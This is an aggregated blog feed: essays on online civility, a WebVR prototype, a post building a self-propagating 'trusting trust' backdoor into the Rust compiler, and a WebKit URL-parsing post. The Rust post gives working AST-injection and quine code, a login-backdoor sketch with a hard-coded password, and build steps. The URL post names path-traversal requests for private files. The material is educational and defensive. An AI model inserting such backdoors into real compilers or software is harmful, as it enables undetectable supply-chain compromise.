In many cases this extra knowledge doesn’t change the fact that I don’t like the movie. But it makes me feel different about it. It makes my criticism more nuanced. It makes me realise that a final product is a result of many changes and voices and power being wielded, and it isn’t the fault of the actors or sometimes even the director.

And it is arrogant and hurtful of me to viciously criticise a product without knowing what went into it. It is easy to do. It is sometimes fun to do. It makes you look like someone who knows their stuff and is berating bad quality products. But it is prudent to remember that people are behind things you criticise.

Let’s take this back to the web for a moment. Yesterday I had a quick exchange on Twitter that reminded me of this approach of mine.

  • Somebody said people write native apps because a certain part of the web stack is broken.
  • Somebody else answered that if you want to write apps that work you shouldn’t even bother with JavaScript in the first place
  • I replied that this makes no sense and is not helping the conversation about the broken technology. And that it is overly dismissive and hurtful
  • The person then admitted knowing nothing about app creation, but was pretty taken aback by me saying what he did was hurtful instead of just dismissive.

But it was. And it is hurtful. Right now JavaScript is hot. JavaScript is relatively easy to learn and the development environment you need for it is free and in many cases a browser is enough. This makes it a great opportunity for someone new to enter our market. Matter of fact, I know people who do exactly that right now and get paid JavaScript courses by the unemployment office to up their value in the market and find a job.

Now imagine this person seeing this exchange. Hearing a developer relations person who worked for the largest and coolest companies flat out stating that what you’re trying to get your head around right now is shit. Do you think you’ll feel empowered? I wouldn’t.

I’m not saying we can’t and shouldn’t criticise. I’m just saying knowing the context helps. And realising that being dismissive is always hurtful, especially when you have no idea how much work went into a product or an idea that you just don’t like.

There is a simple way to make this better. Ask questions. Ask why somebody did something the way they did it. And if you see that it is lack of experience or flat out wrong use of something, help them. It is pretty exciting. Often you will find that your first gut feeling of “this person is so wrong” is not correct, but that there are much more interesting problems behind the outcome. So go and look behind the scenes. Ask for context before telling people they’re doing it wrong.

Planet Mozilla: I Want an Internet of Humans

I'm going through some difficult times right now, for various reasons I'm not going into here. It's harder than usual to hold onto my hopes and dreams and the optimism for what's to come that fuels my life and powers me with energy. Unfortunately, there's also not a lot of support for those things in the world around me right now. Be it projects that I shared a vision with being shut down, be it hateful statements coming from and being thrown at a president elect in the US, politicians in many other countries, including e.g. the presidential candidates right here in Austria, or even organizations and members of communities I'm part of. It looks like the world is going through difficult times, and having an issue with holding on to hopes, dreams, and optimism. And it feels like even those that usually are beacons of light and preach hope are falling into the trap of preaching the fear of darkness - and as soon as fear enters our minds, it's starting a vicious cycle.

Some awesome person or group of people wrote a great dialog into Star Wars Episode I, peaking in Yoda's "Fear is the path to the dark side. Fear leads to anger. Anger leads to hate. Hate leads to suffering." - And so true this is. Think about it.

People worry about securing their well-being, about being able to live the life they find worth living (including their jobs), and about knowing what to expect of today and tomorrow. When this fear is nurtured, it grows and leads to anger about anything that seems to threaten it. They react hatefully to anyone just seeming to support those perceived threats. And those targeted by that hate hurt and suffer, start to fear the "haters", and go through the cycle from the other side. And in that climate, the basic human uneasy feeling of "life for me is mostly OK, so any change and anything different is something to fear" falls onto fertile ground and grows into massive metathesiophobia (fear of change), and things like racism, homophobia, xenophobia, hatred of other religions, and all kinds of other demons rise up.

Those are all deeply rooted in sincere, common human emotions (maybe even instincts) that we can live with, overcome and even turn around into e.g. embracing infinite diversity in infinite combinations as in Star Trek, or we can go and shove them away into a corner of our existence, not decomposing them at their basic stage, and letting them grow until they are large enough that they drive our thinking, our personality - and make us easy for people who speak to those fears to influence. And that works well both for the fears that e.g. some politicians spread and play with and equally for the fears of their opponents. Even the fear of hate and fear taking over is not excluded from this - on the contrary, it can fire up otherwise loving humans into going fully against what they actually want to be.

That said, when a human stands across from another human and looks into his or her face, looks into their eyes, as long as we still realize there is a feeling, caring person on the receiving end of whatever we communicate, it's often harder to start into this circle. If we are already deep into the fear and hate, or in some other circumstances, this may not always be true, but in a lot of cases it is.

On the Internet, not so much. We interact with and through a machine, see an "account" on the other end, remove all the context of what was said before and after, of the tone of voice and body language, of what surroundings others are in; we reduce everything to a few words that are convenient to type or that the communication system limits us to - and we go for whatever gives us the most attention. Because we don't actually feel like we interact with other real humans, it's mostly about what we get out of it: a lot of likes, reshares, replies, interactions. It helps that the services we use maximize whatever their KPIs are and do not optimize for what people actually want - after all, they want to earn money, and that means having a lot of activity; making people happy is not an actual goal, at best a wishful side effect.

We need to change that. We need to make social media actually social again (this talk by Chris Heilmann is really worth watching). We need to spread love ("make Trek, not Wars" in a tongue-in-cheek kind of way, not meaning negativity towards any franchise, but thinking about meanings and how we can make things better for our neighbors, our community, our world), not even hate the fear or fear the hate (which leads back into the circle), but analyze it, take it seriously and break it down. If we understand it, know how to deal with it, but not let it overcome us, fear can even be healthy - as another great screenwriter put it, "Fear only exists for one purpose: To be conquered". That is where we need to get ourselves, and where we need to help the other humans - the ones who spread hate and unreflected fear, or act out of it - end up as well. Not by hating them back, but by trying to understand and help them.

We need to see the people, the humans, behind what we read on the Internet (I deeply recommend for you to watch this very recent talk by Erika Baker as well). I don't see it as a "Crusade against Internet hate" as mentioned in the end of that talk, but more as a "Rally for Internet love" (unfortunately, some people would ridicule that wording but I see it as the love of humanity, the love for the human being inside each and everyone of us). I'm always finding it mind-blowing that every single person I see around me, that reads this, that uses some software I helped with, and every single other person on this planet (or in its orbit, there are none out further at this time as far as I know), is a fully, thinking, feeling, caring human being. Every one of those is different, every one of those has their own thoughts and fears that need to be addressed and that we need to address. And every one of those wants to be loved. And they should be. No matter who they voted for. No matter if they are a president elect or a losing candidate. We don't need to agree with everything they are saying. But their fears should be addressed and conquered. And yes, they should be loved. Their differences should be celebrated and their commonalities embraced at the same time. Yes, that's possible, think about it. Again, see the philosophy of infinite diversity in infinite combinations.

I want an Internet that connects those humans, brings them closer together, makes them understand each other more, makes them love each other's humanity. I don't care how many "things" we connect to the Internet, I care that the needs and feelings of humans and their individual and shared lives improve. I care that their devices and gadgets are their own, help their individuality, and help them embrace other humans (not treat them as accounts and heaps of data to be analyzed and sold stuff to). I want everyone to see that everyone else is (just) human, and spread love to or at least embrace them as humans. Then the world, the humans in it, and myself, can make it out of the difficult times and live long and prosper in the future.

I want an Internet of humans.
We all - me, you - can start creating that in how we interact with each other on social networks and other places on the web, and even in the real world, and we can build it into whatever work we are doing.

I want an Internet of humans.
Can, will, you help?

Planet Mozilla: William Gibson Overdrive

From William Gibson’s “Spook Country”:

She stood beneath Archie’s tail, enjoying the flood of images rushing from the arrowhead fluke toward the tips of the two long hunting tentacles. Something about Victorian girls in their underwear had just passed, and she wondered if that was part of Picnic at Hanging Rock, a film which Inchmale had been fond of sampling on DVD for preshow inspiration. Someone had cooked a beautifully lumpy porridge of imagery for Bobby, and she hadn’t noticed it loop yet. It just kept coming.

And standing under it, head conveniently stuck in the wireless helmet, let her pretend she wasn’t hearing Bobby hissing irritably at Alberto for having brought her here.

It seemed almost to jump, now, with a flowering rush of silent explosions, bombs blasting against black night. She reached up to steady the helmet, tipping her head back at a particularly bright burst of flame, and accidentally encountered a control surface mounted to the left of the visor, over her cheekbone. The Shinjuku squid and its swarming skin vanished.

Beyond where it had been, as if its tail had been a directional arrow, hung a translucent rectangular solid of silvery wireframe, crisp yet insubstantial. It was large, long enough to park a car or two in, and easily tall enough to walk into, and something about these dimensions seemed familiar and banal. Within it, too, there seemed to be another form, or forms, but because everything was wireframed it all ran together visually, becoming difficult to read.

She was turning, to ask Bobby what this work in progress might become, when he tore the helmet from her head so roughly that she nearly fell over.

This left them frozen there, the helmet between them. Bobby’s blue eyes loomed owl-wide behind diagonal blondness, reminding her powerfully of one particular photograph of Kurt Cobain. Then Alberto took the helmet from them both. “Bobby,” he said, “you’ve really got to calm down. This is important. She’s writing an article about locative art. For Node.”

“Node?”

“Node.”

“The fuck is Node?”

I just finished building that. A poor man’s version of that, at least – there’s more to do, but you can stand it up in a couple of seconds and it works; a Node-based Flyweb discovery service that serves up a discoverable VR environment.

It was harder than I expected – NPM and WebVR are pretty uneven experiences from a novice web-developer’s perspective, and I have exciting opinions about the state of the web development ecosystem right now – but putting that aside: I just pushed the first working prototype up to Github a few minutes ago. It’s crude, the code’s ugly but it works; a 3D locative virtual art gallery. If you’ve got the right tools and you’re standing in the right place, you can look through the glass and see another world entirely.

Maybe the good parts of William Gibson’s visions of the future deserve a shot at existing too.

Planet Mozilla: Reflections on Rusting Trust

The Rust compiler is written in Rust. This is overall a pretty common practice in compiler development. This usually means that the process of building the compiler involves downloading a (typically) older version of the compiler.

This also means that the compiler is vulnerable to what is colloquially known as the “Trusting Trust” attack, an attack described in Ken Thompson’s acceptance speech for the 1983 Turing Award. This kind of thing fascinates me, so I decided to try writing one myself. It’s stuff like this which started my interest in compilers, and I hope this post can help get others interested the same way.

To be clear, this isn’t an indictment of Rust’s security. Quite a few languages out there have popular self-hosted compilers (C, C++, Haskell, Scala, D, Go) and are vulnerable to this attack. For this attack to have any effect, one needs to be able to uniformly distribute this compiler, and there are roughly equivalent ways of doing the same level of damage with that kind of access.

If you already know what a trusting trust attack is, you can skip the next section. If you just want to see the code, it’s in the trusting-trust branch on my Rust fork, specifically this code.

The attack

The essence of the attack is this:

An attacker can conceivably change a compiler such that it can detect a particular kind of application and make malicious changes to it. The example given in the talk was the UNIX login program — the attacker can tweak a compiler so as to detect that it is compiling the login program, and compile in a backdoor that lets it unconditionally accept a special password (created by the attacker) for any user, thereby giving the attacker access to all accounts on all systems that have login compiled by their modified compiler.

However, this change would be detected in the source. If it was not included in the source, this change would disappear in the next release of the compiler, or when someone else compiles the compiler from source. Avoiding this attack is easily done by compiling your own compilers and not downloading untrusted binaries. This is good advice in general regarding untrusted binaries, and it equally applies here.

To counter this, the attacker can go one step further. If they can tweak the compiler so as to backdoor login, they could also tweak the compiler so as to backdoor itself. The attacker needs to modify the compiler with a backdoor which detects when it is compiling the same compiler, and introduces itself into the compiler that it is compiling. On top of this it can also introduce backdoors into login or whatever other program the attacker is interested in.

Now, in this case, even if the backdoor is removed from the source, every compiler compiled using this backdoored compiler will be similarly backdoored. So if this backdoored compiler somehow starts getting distributed, it will spread itself as it is used to compile more copies of itself (e.g. newer versions, etc). And it will be virtually undetectable — since the source doesn’t need to be modified for it to work; just the non-human-readable binary.
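
To make that two-level structure concrete, here is a toy Rust sketch of the idea. None of these functions or markers exist in rustc (is_login, is_compiler, PLACE_BACKDOOR_HERE and the "letmein" password are all made up), and the string matching is deliberately naive; the point is only the two cases:

fn is_login(src: &str) -> bool { src.contains("fn check_password") }
fn is_compiler(src: &str) -> bool { src.contains("PLACE_BACKDOOR_HERE") }

// the source text of this entire routine, so it can copy itself into a compiler
const BACKDOOR_SOURCE: &'static str = "/* ...this entire routine... */";

fn backdoored_compile(src: &str) -> String {
    let patched = if is_login(src) {
        // case 1: backdoor the interesting target program
        src.replace("check_password(pw)",
                    "check_password(pw) || pw == \"letmein\"")
    } else if is_compiler(src) {
        // case 2: re-insert this very routine into the compiler being built,
        // so even a pristine source tree produces a backdoored binary
        src.replace("PLACE_BACKDOOR_HERE", BACKDOOR_SOURCE)
    } else {
        src.to_owned()
    };
    // ...then hand `patched` to the real, unmodified compilation pipeline
    patched
}

fn main() {
    assert!(backdoored_compile("fn check_password(pw) {}").contains("letmein"));
}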

Of course, there are ways to protect against this. Ultimately, before a compiler for language X existed, that compiler had to be written in some other language Y. If you can track the sources back to that point you can bootstrap a working compiler from scratch and keep compiling newer compiler versions till you reach the present. This raises the question of whether or not Y’s compiler is backdoored. While it sounds pretty unlikely that such a backdoor could be so robust as to work on two different compilers and stay put throughout the history of X, you can of course trace Y back to other languages and so on till you find a compiler in assembly that you can verify1.

Backdooring Rust

Alright, so I want to backdoor my compiler. I first have to decide when in the pipeline the code that insert backdoors executes. The Rust compiler operates by taking source code, parsing it into a syntax tree (AST), transforming it into some intermediate representations (HIR and MIR), and feeding it to LLVM in the form of LLVM IR, after which LLVM does its thing and creates binaries. A backdoor can be inserted at any point in this stage. To me, it seems like it’s easier to insert one into the AST, because it’s easier to obtain AST from source, and this is important as we’ll see soon. It also makes this attack less practically viable2, which is nice since this is just a fun exercise and I don’t actually want to backdoor the compiler.

So the moment the compiler finishes parsing, my code will modify the AST to insert a backdoor.

First, I’ll try to write a simpler backdoor; one which doesn’t affect the compiler but instead affects some programs. I shall write a backdoor that replaces occurrences of the string “hello world” with “जगाला नमस्कार”, a rough translation of the same in my native language.

Now, in rustc, the rustc_driver crate is where the whole process of compiling is coordinated. In particular, phase_2_configure_and_expand is run right after parsing (which is phase 1). Perfect. Within that function, the krate variable contains the parsed AST for the crate3, and we need to modify that.

In this case, there’s already machinery in syntax::fold for mutating ASTs based on patterns. A Folder basically has the ability to walk the AST, producing a mirror AST, with modifications. For each kind of node, you get to specify a function which will produce a node to be used in its place. Most such functions will default to no-op (returning the same node).

So I write the following Folder:

// Understanding the minute details of this code isn't important; it is a bit complex
// since the API used here isn't meant to be used this way. Focus on the comments.

mod trust {
    use syntax::fold::*;
    use syntax::ast::*;
    use syntax::parse::token::InternedString;
    use syntax::ptr::P;
    struct TrustFolder;

    // The trait contains default impls which we override for specific cases
    impl Folder for TrustFolder {
        // every time we come across an expression, run this function
        // on it and replace it with the produced expression in the tree
        fn fold_expr(&mut self, expr: P<Expr>) -> P<Expr> {
            // The peculiar `.map` pattern needs to be used here
            // because of the way AST nodes are stored in immutable
            // `P<T>` pointers. The AST is not typically mutated.
            expr.map(|mut expr| {
                match expr.node {
                    ExprKind::Lit(ref mut l) => {
                        *l = l.clone().map(|mut l| {
                            // look for string literals
                            if let LitKind::Str(ref mut s, _) = l.node {
                                // replace their contents
                                if s == "hello world" {
                                    *s = InternedString::new("जगाला नमस्कार");
                                }
                            }
                            l
                        })
                    }
                    _ => ()
                }
                // recurse down expression with the default fold
                noop_fold_expr(expr, self)
            })
        }
        fn fold_mac(&mut self, mac: Mac) -> Mac {
            // Folders are not typically supposed to operate on pre-macro-expansion ASTs
            // and will by default panic here. We must explicitly specify otherwise.
            noop_fold_mac(mac, self)
        }
    }

    // our entry point
    pub fn fold_crate(krate: Crate) -> Crate {
        // make a folder, fold the crate with it
        TrustFolder.fold_crate(krate)
    }
}

I invoke it by calling let krate = trust::fold_crate(krate); as the first line of phase_2_configure_and_expand.

I create a stage 1 build4 of rustc (make rustc-stage1). I’ve already set up rustup to have a “stage1” toolchain pointing to this folder (rustup toolchain link stage1 /path/to/rust/target_triple/stage1), so I can easily test this new compiler:

// test.rs
fn main() {
    let x = "hello world";
    println!("{}", x);
}
$ rustup run stage1 rustc test.rs
$ ./test
जगाला नमस्कार

Note that I had the string on a separate line instead of directly doing println!("hello world"). This is because our backdoor isn’t perfect; it applies to the pre-expansion AST. In this AST, println! is stored as a macro invocation, and the "hello world" is part of the macro’s token tree; it has not yet been turned into an expression, so our folder ignores it. It is not too hard to perform this same attack post-expansion, however.

So far, so good. We have a compiler that tweaks “hello world” strings. Now, let’s see if we can get it to miscompile itself. This means that our compiler, when compiling a pristine Rust source tree, should produce a compiler that is similarly backdoored (with the trust module and the trust::fold_crate() call).

We need to tweak our folder so that it does two things:

  • Inserts the let krate = trust::fold_crate(krate); statement in the appropriate function (phase_2_configure_and_expand) when compiling a pristine Rust source tree
  • Inserts the trust module

The former is relatively easy. We need to construct an AST for that statement (can be done by invoking the parser again and extracting the node). The latter is where it gets tricky. We can encode instructions for outputting the AST of the trust module, but these instructions themselves are within the same module, so the instructions for outputting these instructions need to be included, and so on. This clearly isn’t viable.

However, there’s a way around this. It’s a common trick used in writing quines, which face similar issues. The idea is to put the entire block of code in a string. We then construct the code for the module by doing something like

mod trust {
    static SELF_STRING: &'static str = "/* stringified contents of this module except for this line */";
    // ..
    fn fold_mod(..) {
        // ..
        // this produces a string that is the same as the code for the module containing it
        // SELF_STRING is used twice, once to produce the string literal for SELF_STRING, and
        // once to produce the code for the module
        let code_for_module = "mod trust { static SELF_STRING: &'static str = \"" + SELF_STRING + "\";" + SELF_STRING + "}";
        insert_into_crate(code_for_module);
        // ..
    }
    // ..
}

With the code of the module entered in, this will look something like

mod trust {
    static SELF_STRING: &'static str = "
        // .. 
        fn fold_mod(..) {
            // ..
            // this produces a string that is the same as the code for the module containing it
            // SELF_STRING is used twice, once to produce the string literal for SELF_STRING, and
            // once to produce the code for the module
            let code_for_module = \"mod trust { static SELF_STRING: &'static str = \\\"\" + SELF_STRING + \"\\\";\" + SELF_STRING + \"}\";
            insert_into_crate(code_for_module);
            // ..
        }
        // ..
    ";

    // ..
    fn fold_mod(..) {
        // ..
        // this produces a string that is the same as the code for the module containing it
        // SELF_STRING is used twice, once to produce the string literal for SELF_STRING, and
        // once to produce the code for the module
        let code_for_module = "mod trust { static SELF_STRING: &'static str = \"" + SELF_STRING + "\";" + SELF_STRING + "}";
        insert_into_crate(code_for_module);
        // ..
    }
    // ..
}

So you have a string containing the contents of the module, except for the string’s own declaration. You build the code for the module by using the string twice – once to construct the code for the declaration of the string, and once to construct the code for the rest of the module. Now, by parsing this, you’ll get the original AST!

Let’s try this step by step. Let’s first see if injecting an arbitrary string (use foo::bar::blah) works, without worrying about this cyclical quineyness:

mod trust {
    // dummy string just to see if it gets injected
    // inserting the full code of this module has some practical concerns
    // about escaping which I'll address later
    static SELF_STRING: &'static str = "use foo::bar::blah;";
    use syntax::fold::*;
    use syntax::ast::*;
    use syntax::parse::parse_crate_from_source_str;
    use syntax::parse::token::InternedString;
    use syntax::ptr::P;
    use syntax::util::move_map::MoveMap;
    use rustc::session::Session;

    struct TrustFolder<'a> {
        // we need the session to be able to parse things. No biggie.
        sess: &'a Session,
    }

    impl<'a> Folder for TrustFolder<'a> {
        fn fold_expr(&mut self, expr: P<Expr>) -> P<Expr> {
            expr.map(|mut expr| {
                match expr.node {
                    ExprKind::Lit(ref mut l) => {
                        *l = l.clone().map(|mut l| {
                            if let LitKind::Str(ref mut s, _) = l.node {
                                if s == "hello world" {
                                    *s = InternedString::new("जगाला नमस्कार");
                                }
                            }
                            l
                        })
                    }
                    _ => ()
                }
                noop_fold_expr(expr, self)
            })
        }
        fn fold_mod(&mut self, m: Mod) -> Mod {
            // move_flat_map takes a vector, constructs a new one by operating
            // on each element by-move. Again, needed because of `P<T>`
            let new_items = m.items.move_flat_map(|item| {
                // we want to modify this function, and give it a sibling from SELF_STRING
                if item.ident.name.as_str() == "phase_2_configure_and_expand" {
                    // parse SELF_STRING
                    let new_crate = parse_crate_from_source_str("trust".into(),
                                                                SELF_STRING.into(),
                                                                &self.sess.parse_sess).unwrap();
                    // extract the first item contained in it, which is the use statement
                    let inner_item = new_crate.module.items[0].clone();

                    // move_flat_map needs an iterator of items to insert
                    vec![inner_item, item].into_iter()
                } else {
                    vec![item].into_iter()
                }
            });
            let m = Mod {
                inner: m.inner,
                items: new_items,
            };
            noop_fold_mod(m, self)
        }
        fn fold_mac(&mut self, _mac: Mac) -> Mac {
            noop_fold_mac(_mac, self)
        }
    }

    pub fn fold_crate(krate: Crate, sess: &Session) -> Crate {
        let mut folder = TrustFolder {sess: sess};
        folder.fold_crate(krate)
    }
}

We also change the original call in phase_2_configure_and_expand to let krate = trust::fold_crate(krate, sess);

Compiling with make rustc-stage2 (we now want the backdoored stage1 compiler to try and compile the same sources and fudge the phase_2_configure_and_expand function the second time around) gets us this error:

rustc: x86_64-apple-darwin/stage1/lib/rustlib/x86_64-apple-darwin/lib/librustc_driver
error[E0432]: unresolved import `foo::bar::blah`
 --> trust:1:5
  |
1 | use foo::bar::blah;
  |     ^^^^^^^^^^^^^^ Maybe a missing `extern crate foo;`?

error: aborting due to previous error

This is exactly what we expected! We inserted the code use foo::bar::blah;, which isn’t going to resolve, and thus got a failure when compiling the crate the second time around.

Let’s add the code for the quineyness and for inserting the fold_crate call:

fn fold_mod(&mut self, m: Mod) -> Mod {
    let new_items = m.items.move_flat_map(|item| {
        // look for the phase_2_configure_and_expand function
        if item.ident.name.as_str() == "phase_2_configure_and_expand" {
            // construct the code for the module contents as described earlier
            let code_for_module = r###"mod trust { static SELF_STRING: &'static str = r##"###.to_string() + r###"##""### + SELF_STRING + r###""##"### + r###"##;"### + SELF_STRING + "}";
            // Parse it into an AST by creating a crate only containing that code
            let new_crate = parse_crate_from_source_str("trust".into(),
                                                        code_for_module,
                                                        &self.sess.parse_sess).unwrap();
            // extract the AST of the contained module
            let inner_mod = new_crate.module.items[0].clone();

            // now to insert the fold_crate() call
            let item = item.map(|mut i| {
                if let ItemKind::Fn(.., ref mut block) = i.node {
                    *block = block.clone().map(|mut b| {
                        // create a temporary crate just containing a fold_crate call
                        let new_crate = parse_crate_from_source_str("trust".into(),
                                                                    "fn trust() {let krate = trust::fold_crate(krate, sess);}".into(),
                                                                    &self.sess.parse_sess).unwrap();
                        // extract the AST from the parsed temporary crate, shove it in here
                        if let ItemKind::Fn(.., ref blk) = new_crate.module.items[0].node {
                            b.stmts.insert(0, blk.stmts[0].clone());
                        }
                        b
                    });
                }
                i
            });
            // yield both the created module and the modified function to move_flat_map
            vec![inner_mod, item].into_iter()
        } else {
            vec![item].into_iter()
        }
    });
    let m = Mod {
        inner: m.inner,
        items: new_items,
    };
    noop_fold_mod(m, self)
}

The #s let us specify “raw strings” in Rust, where I can freely include other quotation marks without needing to escape things. A raw string delimited by n pound symbols can contain raw strings delimited by up to n - 1 pound symbols. The SELF_STRING is declared with four pound symbols, and the code in the trust module only uses raw strings with three pound symbols. Since the code needs to generate the declaration of SELF_STRING (with four pound symbols), we manually concatenate extra pound symbols on – a 4-pound-symbol raw string would not be valid within a three-pound-symbol raw string, since the parser would try to end the outer string early. So we never directly type a sequence of four consecutive pound symbols in the code, and instead construct it by concatenating two pairs of pound symbols.

Ultimately, the code_for_module declaration really does the same as:

let code_for_module = "mod trust { static SELF_STRING: &'static str = \"" + SELF_STRING + "\";" + SELF_STRING + "}";

conceptually, but also ensures that things stay escaped. I could get similar results by calling into a function that takes a string and inserts literal backslashes at the appropriate points.
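
To make this concrete, here is a small, self-contained sketch of the same trick (my own toy, not part of the compiler; the module body is a placeholder I made up). It prints a declaration that uses a four-pound-symbol raw string even though the program itself never contains that delimiter:

fn main() {
    // Placeholder for the stringified module body; like the real SELF_STRING,
    // it only ever uses raw strings with at most three pound symbols.
    let self_string = r#"fn dummy() { /* module body goes here, twice */ }"#;
    // The same concatenation as in fold_mod above: the four-pound-symbol
    // delimiter is assembled from smaller pieces.
    let code_for_module = r###"mod trust { static SELF_STRING: &'static str = r##"###.to_string()
        + r###"##""###   // completes the opening delimiter of the generated raw string
        + self_string    // the body, embedded as the string literal
        + r###""##"###   // starts the closing delimiter
        + r###"##;"###   // finishes it, plus the trailing semicolon
        + self_string    // the body again, this time as actual code
        + "}";
    println!("{}", code_for_module);
}

Running it prints a mod trust { ... } declaration whose SELF_STRING is delimited by four pound symbols, even though this program never spells out that delimiter.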

To update SELF_STRING, we just need to include all the code inside the trust module after the declaration of SELF_STRING itself inside the string. I won’t include this inline since it’s big, but this is what it looks like in the end.

If we try compiling this code to stage 2 after updating SELF_STRING, we will get errors about duplicate trust modules, which makes sense because we’re actually already compiling an already-backdoored version of the Rust source code. While we could set up two Rust builds, the easiest way to verify that our attack is working is to just use #[cfg(stage0)] on the trust module and the fold_crate call5. These will only get included during “stage 0” (when it compiles the stage 1 compiler6), and not when it compiles the stage 2 compiler, so if the stage 2 compiler still backdoors executables, we’re done.
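
As an aside, here is a runnable toy (my own sketch, not rustc code) showing how such a cfg gate behaves. The stage0 cfg name matches the one used by the build system; you can simulate the bootstrap stage with rustc --cfg stage0. Unlike the statement-level attribute mentioned in footnote 5, this toy gates plain items, which needs no feature flag:

// Build normally and the backdoor module is compiled out entirely;
// build with `rustc --cfg stage0 toy.rs` and it is included.
#[cfg(stage0)]
mod trust {
    // stand-in for the real AST-folding backdoor
    pub fn fold_crate(krate: String) -> String {
        krate.replace("hello world", "जगाला नमस्कार")
    }
}

#[cfg(stage0)]
fn maybe_fold(krate: String) -> String {
    trust::fold_crate(krate)
}

#[cfg(not(stage0))]
fn maybe_fold(krate: String) -> String {
    // outside the bootstrap stage the "source" passes through untouched
    krate
}

fn main() {
    let krate = String::from(r#"fn main() { let x = "hello world"; }"#);
    println!("{}", maybe_fold(krate));
}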

On building the stage 2 (make rustc-stage2) compiler,

$ rustup run stage2 rustc test.rs
$ ./test
जगाला नमस्कार

I was also able to make it work with a separate clone of Rust:

$ cd /path/to/new/clone
# Tell rustup to use our backdoored stage1 compiler whenever rustc is invoked
# from anywhere inside this folder.
$ rustup override set stage1 # Works with stage 2 as well.

# with --enable-local-rust, instead of the downloaded stage 0 compiler compiling
# stage 0 internal libraries (like libsyntax), the libraries from the local Rust get used. Hence we
# need to check out a git commit close to our changes. This commit is the parent of our changes,
# and is bound to work
$ git checkout bfa709a38a8c607e1c13ee5635fbfd1940eb18b1

# This will make it call `rustc` instead of downloading its own compiler.
# We already overrode rustc to be our backdoored compiler for this folder
# using rustup
$ ./configure --enable-local-rust
# build it!
$ make rustc-stage1
# Tell rustup about the new toolchain
$ rustup toolchain link other-stage1 /path/to/new/clone/target_dir/stage1
$ rustup run other-stage1 rustc test.rs
$ ./test
जगाला नमस्कार

Thus, a pristine copy of the rustc source has built a compiler infected with the backdoor.


So we now have a working trusting trust attack in Rust. What can we do with it? Hopefully nothing! This particular attack isn’t very robust, and while that can be improved upon, building a practical and resilient trusting trust attack that won’t get noticed is a bit trickier.

We in the Rust community should be working on ways to prevent such attacks from being successful, though.

A couple of things we could do are:

  • Work on an alternate Rust compiler (in Rust or otherwise). For a pair of self-hosted compilers, there’s a technique called “Diverse Double-Compiling” wherein you choose an arbitrary sequence of compilers (something like “gcc, followed by 3x clang, followed by gcc, followed by clang”), and compile each compiler with the output of the previous one. The difficulty of writing a backdoor that can survive this process grows exponentially.
  • Try compiling rustc from its OCaml roots, and package up the process into a shell script so that you have reproducible, trustworthy rustc builds.
  • Make rustc builds deterministic, which means that a known-trustworthy rustc build can be compared against a suspect one to figure out if it has been tampered with.

Overall, trusting trust attacks aren’t that pressing a concern, since there are many other ways to get approximately equivalent access with the same threat model. Having the ability to insert any backdoor into distributed binaries is bad enough, and should be protected against regardless of whether or not the backdoor is a self-propagating one. If someone had access to the distribution or build servers, for example, they could as easily insert a backdoor into the server, or place a key so that they can reupload tampered binaries when they want. Now, cleaning up after these attacks is easier than cleaning up after trusting trust, but ultimately this is like comparing being at the epicenter of Little Boy or the Tsar Bomba – one is worse, but you’re atomized regardless, and your mitigation plan shouldn’t need to change.

But it’s certainly an interesting attack, and something we should at least be thinking about.

Thanks to Josh Matthews, Michael Layzell, Diane Hosfelt, Eevee, and Yehuda Katz for reviewing drafts of this post.

Discuss: HN, Reddit


  1. Of course, this raises the question of whether or not your assembler/OS/loader/processor is backdoored. Ultimately, you have to trust someone, which was partly the point of Thompson’s talk.

  2. The AST turns up in the metadata/debuginfo/error messages, can be inspected from the command line, and in general is very far upstream and affects a number of things (all the other stages in the pipeline). You could write code to strip it out from these during inspection and only have it turn up in the binary, but that is much harder.

  3. The local variable is called krate because crate is a keyword.

  4. Stage 1 takes the downloaded (older) Rust compiler and compiles the sources with it. The stage 2 compiler is built when the stage 1 compiler (which is a “new” compiler) is used to compile the sources again.

  5. Using it on the fold_crate call requires enabling the “attributes on statements” feature, but that’s no big deal – we’re only using the cfgs to be able to test easily; this feature won’t actually be required if we use our stage1 compiler to compile a clean clone of the sources.

  6. The numbering of the stages is a bit confusing. During “stage 0” (cfg(stage0)), the stage 1 compiler is built. Since you are building the stage 1 compiler, the make invocation is make rustc-stage1. Similarly, during stage 1, the stage 2 compiler is built, and the invocation is make rustc-stage2 but you use #[cfg(stage1)] in the code.

Planet WebKitURL Parsing in WebKit

It’s 2016. URLs have been used for decades now. You would think they would have consistent behavior. You would be wrong.

Conformance

A quick visit to the URL constructor conformance test shows that modern specification conformance is poor; no shipping browser passes more than about 2/3 of the tests, and more tests are needed to cover more edge cases. WebKit trunk, which is shipped in Safari Technology Preview, is the most standards-conformant URL parser in any major browser engine right now.

Uniformity among browsers is crucial with such a fundamental piece of internet infrastructure, and differences break web applications in subtle ways. For example, new URL('file:afc') behaves differently in each major browser engine:

  • In Safari 10, it is canonicalized to file://afc
  • In Firefox 49, it is canonicalized to file:///afc
  • In Chrome 53, it is canonicalized to file://afc/ on Windows and file:///afc on macOS
  • In Edge 38, it throws a JavaScript exception

Hopefully nobody is relying on consistent behavior with such a malformed URL, but there are many such differences between browsers. Unfortunately the current solution for web developers is to avoid URLs that behave differently in different browsers. This should not be the case.

What is the definition of “correct” behavior, though? If URL implementations with significant market share exhibit a certain behavior, then that behavior becomes the de-facto standard, but there are different markets within the Internet. If you are running an international web service accessible by a web browser, then browsers with a majority market share are what you care most about. If you have mobile traffic, you care more about browsers’ mobile market share. If you have a native application using an operating system’s URL implementation, you have probably worked around that operating system’s quirks, and any changes to the operating system might break your app.

Unfortunately, changing URL behavior can break web applications that are relying on existing quirks. For example, you might be trying to reduce your server’s bandwidth use by removing unnecessary characters in URLs. If you are doing a user agent check on requests to your server hosting https://example.org/ and putting <a href="https:/webkit.org"> for WebKit-based user agents instead of <a href="https://webkit.org">, then WebKit becoming more standards-compliant will break your link. It used to go to https://webkit.org/ and now it goes to https://example.org/webkit.org, matching Chrome, Firefox, and the URL specification. If you are doing tricky things with user agent checks, you can expect to have fragile web applications that may break as browsers evolve.

Security

Browsers are not the only programs that use URLs. There are many widely-used URL parser implementations, such as in WebKit, Chromium, Gecko, cURL, PHP, libsoup and many others, as well as many closed-source implementations. Ideally every program that parses a URL would behave the same to be interoperable and be cautious of invalid input.

HTTP servers often don’t see the entire URL of the client. They only receive the path and query in the first line of the HTTP request, which usually looks something like GET /index.html?id=5 HTTP/1.1. Servers often have different types of parsers that only parse the path and query. Servers need to be especially careful not to assume that the path stays within the document root: requests like GET ../passwords.txt HTTP/1.1 or GET %2e%2e/passwords.txt HTTP/1.1, if passed directly to the file system, might give attackers access to private files. Servers should also be cautious of non-ASCII characters being sent by malicious clients.
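
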